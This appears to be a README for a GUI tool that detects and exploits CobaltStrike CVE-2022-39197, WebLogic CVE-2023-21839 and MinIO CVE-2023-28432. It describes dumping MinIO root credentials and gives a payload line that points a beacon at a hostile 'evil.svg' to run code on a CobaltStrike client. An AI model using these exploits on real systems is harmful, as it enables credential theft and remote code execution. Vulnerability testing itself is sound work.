
A testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432
A testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432
A graphical vulnerability detection and exploitation tool for these three vulnerabilities.
Running the jar requires Java 8
For single target, not suitable for multi-IP vulnerability scanning
When packaging, the Weblogic vulnerability exploitation requires referencing wlfullclient.jar, which needs to be added manually.
java -jar Gui-poc-test.jar
Usage: There are two buttons for detection and exploitation. The tool interface provides hints for different vulnerabilities.
Input the target, no need to enter the port, default is 9000, changeable, see source code GuiDemo.java:line144
Displays MINIO_ROOT_USER and MINIO_ROOT_PASSWORD, etc.
Input target IP, port, LDAP server address
Detection:
Note: Exploitation requires setting up your own LDAP server (public network)

payload example:
beacon.exe http://127.0.0.1:4444/evil.svg
Result: The trojan runs on Windows, and the CS client on Mac gets a session.
At the same time, the CS client executes the jar package content, popping up a calculator.

Windows records the CS access address
